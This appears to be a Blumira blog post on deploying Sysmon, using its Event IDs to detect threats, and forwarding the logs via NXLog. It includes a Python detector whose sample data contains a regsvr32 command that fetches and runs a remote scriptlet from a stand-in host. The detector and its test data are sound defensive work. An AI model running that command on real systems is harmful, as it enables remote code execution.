In addition to the default built-in logging that Windows Server offers, there are configuration options and add-on software that can increase the visibility of your environment. Alongside enabling Windows Advanced Auditing, System Monitor (Sysmon) is one of the most commonly used add-ons for Windows logging. With Sysmon, you can detect malicious activity by tracking process behavior and network traffic, and build detections based on that activity.
Sysmon is part of the Sysinternals suite, now owned by Microsoft, and enriches the standard Windows logs with higher-level monitoring of events such as process creation, network connections and changes to the file system. It is extremely easy to install and deploy, and the following steps will turn on an incredible amount of logging.
You can run a Poshim script to automatically install Sysmon, or you can install it manually:
Invoke-WebRequest -Uri https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml -OutFile C:\Windows\config.xml
sysmon64.exe -accepteula -i C:\Windows\config.xml
There are several extremely helpful Windows Event IDs that Sysmon generates to help detect common threats across many different enterprises. A few examples of the more useful generated events for security purposes are listed below. A full list of Event IDs that Sysmon can generate is located on its download page.
If you need to access the Sysmon events locally as opposed to viewing them in a SIEM, you will find them in Event Viewer under Applications and Services Logs > Microsoft > Windows > Sysmon.
Sysmon will not only show which processes are being run; it will also show when they end, along with a lot of information about the executable or binary itself. It also provides hashes for all of the binaries that are run on the system and lists whether they are signed, making it easy to see if malicious code is attempting to mimic legitimate programs such as PowerShell or other built-in Microsoft tools.
Above, you can see the Registry Editor program being run. In cases where you are unable to run an allowlist-only environment, you can use events such as these to alert when processes are running, whether they are signed by the appropriate vendor, or whether they are spawning processes that they shouldn't be (such as MS Word spawning PowerShell).
In this example, we can see that Setup.exe has been run, by whom, and that it is reaching out to download additional content from a cloud provider. These events can be useful in detecting command and control traffic (which may indicate that attackers are sending commands to steal data, spread malware, etc.), as well as giving visibility into which applications are accessing certain internet resources.
One action an attacker or malicious user with sufficient privileges could take is to disable the Sysmon service.
Alerts on additions and modifications to certain registry locations can be beneficial for detecting malicious persistence on an endpoint. Entries are often added to the Windows “Run” and “RunOnce” keys so that malware can resume its activity after a host is rebooted.
There are several benefits to logging DNS traffic, such as finding malicious remote access tools, security misconfigurations and command and control traffic.
Here we can see the popular Red Canary Atomic Red Team test for MITRE ATT&CK T1117 “Regsvr32” across several of the listed event IDs. In short, regsvr32 can download and register DLLs (dynamic-link libraries) from URLs via the command line, something that is relatively easy to detect with Sysmon installed.
Event ID 1 shows:
Event ID 3 shows:
Event ID 22 shows:
And when you tie them all together, you can create detections based on the malicious activity.
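The correlation described above, as an added example that is not from the original post or from Blumira: a small Python script that parses constructed records in the Sysmon operational channel's XML shape and ties Event IDs 1, 22 and 3 together by ProcessGuid, flagging a regsvr32 process whose command line names a remote scriptlet URL and that then resolves a name and connects out. The event XML, GUIDs, hostname and IP address are all constructed samples; the field names follow Sysmon's schema and the namespace is the standard Windows event schema.

```python
import re
import xml.etree.ElementTree as ET

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}

def _ev(eid, **data):
    """Build one constructed record in the Sysmon channel's XML shape."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{EVT_NS}"><System><EventID>{eid}</EventID></System>'
            f"<EventData>{fields}</EventData></Event>")

# Constructed sample: one regsvr32 run that fetches a remote scriptlet (what the
# Atomic test does) plus one benign local registration for comparison.
SAMPLE_XML = "<Events>" + "".join([
    _ev(1, ProcessGuid="{G1}", Image=r"C:\Windows\System32\regsvr32.exe",
        CommandLine="regsvr32.exe /s /i:http://example.invalid/x.sct scrobj.dll",
        ParentImage=r"C:\Windows\System32\cmd.exe"),
    _ev(22, ProcessGuid="{G1}", QueryName="example.invalid"),
    _ev(3, ProcessGuid="{G1}", DestinationIp="203.0.113.10", DestinationPort="80"),
    _ev(1, ProcessGuid="{G2}", Image=r"C:\Windows\System32\regsvr32.exe",
        CommandLine=r"regsvr32.exe /s C:\App\app.dll", ParentImage=r"C:\App\setup.exe"),
]) + "</Events>"

def parse_events(xml_text):
    """Return (event_id, {DataName: value}) for each <Event> in the channel XML."""
    out = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        eid = int(ev.find("e:System/e:EventID", NS).text)
        out.append((eid, {d.get("Name"): d.text for d in ev.findall("e:EventData/e:Data", NS)}))
    return out

def find_remote_regsvr32(events):
    """Tie IDs 1, 22 and 3 together by ProcessGuid: flag a regsvr32 process whose
    command line names a URL and that also resolved a name and connected out."""
    by_guid = {}
    for eid, data in events:
        by_guid.setdefault(data.get("ProcessGuid"), {}).setdefault(eid, []).append(data)
    hits = []
    for guid, evs in by_guid.items():
        for proc in evs.get(1, []):
            is_regsvr = proc.get("Image", "").lower().endswith("regsvr32.exe")
            has_url = re.search(r"/i:https?://", proc.get("CommandLine", ""), re.I)
            if is_regsvr and has_url and 22 in evs and 3 in evs:
                hits.append({"guid": guid, "parent": proc.get("ParentImage"),
                             "dns": [d["QueryName"] for d in evs[22]],
                             "dest": [f"{d['DestinationIp']}:{d['DestinationPort']}" for d in evs[3]]})
    return hits
```

Against the sample, only the `{G1}` chain is flagged; the local registration under `{G2}` produces no DNS or network events and is ignored.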
Learn more about getting the most out of your Windows logging tools in “How to Optimize Windows Logging for Security,” and see how Blumira’s platform automatically detects and remediates security findings.
Once Sysmon is configured, you will need to add the Sysmon event channel to your NXLog configuration in order to start sending logs to Blumira’s platform for detection and response. You can use our latest version of Flowmira, or add the Sysmon route to your existing config. The latest version of Flowmira can be found here: https://github.com/Blumira/Flowmira/blob/master/nxlog.conf
To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.
In this guide, you’ll learn: